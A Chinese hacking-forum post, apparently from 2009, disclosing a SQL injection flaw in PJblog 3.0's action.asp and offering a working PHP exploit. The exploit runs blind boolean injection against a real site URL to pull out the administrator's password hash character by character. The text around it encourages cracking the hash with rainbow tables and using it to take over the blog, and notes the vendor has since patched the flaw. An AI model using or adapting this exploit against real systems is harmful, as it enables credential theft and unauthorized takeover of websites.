PJblog V3.0 0day+EXP 's

作者：bink

影响版本：3.0
信息来源：零客网安www.0kee.com
Author：bink
漏洞文件：action.asp

很SB的洞。
第14行

strcname=request("cname") set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

这个贱B下午就跑人官方去捣乱了。

强奸出的密码是sha1，突死有彩虹表的人继续强奸吧
直接吊hashkey可以进前台操蛋
变量是双引号包着的，所以工具吊不出。
扔个exp。 好不好使看各位造化鸟。

<?php /* PJblog V3.0 0day exp code by 小蟑螂&bink www.0kee.com    www.t00ls.net 09.04.22 */  $url="http://www.pjhome.net";    //注入地址 $var_name="puterjam";    //管理员 $var_key="check_right";  if ($_SESSION["LenI"]){ $LenI=$_SESSION["LenI"]; }else{ $LenI=1; } for($i=$LenI;$i<=40;$i++){ if($_SESSION["LenDo"]){ $StaAsc=$_SESSION["LenDo"]; }else{ $StaAsc=31; } echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127"; for($j=$StaAsc;$j<=127;$j++){ $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=/''.$var_name.'/'%29%3e'.$j.'%20and%20"1"="1'; $var_pagelen=file_get_contents($newurl); $var_newpagelen=strpos($var_pagelen,$var_key); if($var_newpagelen == true){ $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j); unset($_SESSION["LenDo"]); $_SESSION["LenI"]=$i+1; doReload(); break; } if($j == $StaAsc+10){ doReload(); break; } } } if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }  function doReload(){ ?> <script  language="javascript"> <!-- window.setTimeout('location.reload()',1000); //--> </script> <?php } ?>

此文发布时官方已经打了补丁